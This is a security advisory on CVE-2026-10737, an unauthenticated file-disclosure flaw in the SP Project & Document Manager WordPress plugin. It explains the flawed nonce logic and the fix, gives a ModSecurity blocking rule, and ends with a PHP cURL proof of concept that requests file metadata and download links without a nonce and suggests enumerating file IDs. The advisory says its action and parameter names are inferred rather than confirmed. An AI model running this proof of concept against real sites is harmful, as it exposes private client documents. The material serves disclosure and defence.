Atomic Edge analysis of CVE-2026-10737 (metadata-based): The SP Project & Document Manager plugin for WordPress (slug: sp-client-document-manager) contains a missing authorization vulnerability in the view_file() function up to version 4.71. Unauthenticated attackers can read file metadata and obtain download links for arbitrary files stored inside project folders. The CVSS score is 7.5 (High) due to the network-based, low-complexity attack with no privileges required.
The root cause is a missing capability check on the view_file function. The description reveals a flawed authorization gate that uses a negated nonce check OR-chained with permission checks. This means a missing or invalid nonce causes the entire condition to evaluate to true, bypassing all capability and ownership checks. Access to root-level files (pid == 0) is blocked, but files inside project folders remain exposed. This inference is based on the CWE-862 classification (Missing Authorization) and the vulnerability description. No code diff confirms exact line numbers.
Exploitation occurs by sending a POST request to /wp-admin/admin-ajax.php with the action parameter set to the plugin’s AJAX handler (likely sp_client_document_manager_view_file or similar based on plugin conventions). The attacker must supply a valid file ID via a POST parameter (likely file_id or id). The nonce parameter can be omitted or set to an invalid value since the flawed logic negates this check. The server returns the file metadata and a direct download link.
The fix requires proper authorization checks inside the view_file function. The developer must implement a capability check (such as current_user_can()) before accessing file data. The nonce verification should be corrected so that a missing or invalid nonce denies access rather than allowing it. The OR-chained condition should be restructured to use AND logic, ensuring all checks must pass before granting access.
The impact is severe. An unauthenticated attacker can enumerate file IDs and retrieve metadata (filenames, sizes, upload dates) along with direct download links for any file stored inside project folders. These files may contain sensitive business data, client information, or internal documents. The root-level folder protection prevents access only to pid == 0 files, but the majority of user-stored files remain exposed. This leads to a significant confidentiality breach.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-10737 (metadata-based)
# Blocks unauthenticated file information disclosure via SP Project & Document Manager AJAX handler
# Rule blocks POST requests to admin-ajax.php with the vulnerable action and missing or invalid nonce
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261937,phase:2,deny,status:403,chain,msg:'CVE-2026-10737 - SP Project & Document Manager file disclosure via AJAX',severity:'CRITICAL',tag:'CVE-2026-10737'"
SecRule ARGS_POST:action "@rx ^sp_client_document_manager_view_file$"
"chain"
SecRule ARGS_POST:file_id "@rx ^[0-9]+$"
"chain"
SecRule ARGS_POST:_wpnonce "@rx ^$"
"t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-10737 - SP Project & Document Manager <= 4.71 - Missing Authorization to Unauthenticated Arbitrary File Information Disclosure
$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$ajax_endpoint = $target_url . '/wp-admin/admin-ajax.php';
// The AJAX action is inferred from the plugin slug 'sp-client-document-manager'
// Common patterns include 'sp_client_document_manager_view_file' or 'spcdm_view_file'
// Adjust if the plugin uses a different action name
$action = 'sp_client_document_manager_view_file';
// The file ID to retrieve metadata and download link for
// An attacker would likely brute-force or enumerate file IDs
$file_id = 1;
// Initialize cURL
$ch = curl_init();
// Set POST parameters - nonce omitted to trigger the flawed authorization gate
$post_data = array(
'action' => $action,
'file_id' => $file_id
);
curl_setopt($ch, CURLOPT_URL, $ajax_endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Display results
echo "HTTP Status Code: " . $http_code . "nn";
echo "Response:n";
print_r(json_decode($response, true));
// If the response contains file metadata and download URL, the vulnerability is present
// Example expected output: file name, file size, file URL, etc.
// Note: The exact action parameter may differ; common alternatives to try:
// - spcdm_view_file
// - sp_client_document_manager_get_file
// - sp_document_manager_view_file
// The file_id parameter may also be named 'id' or 'file'
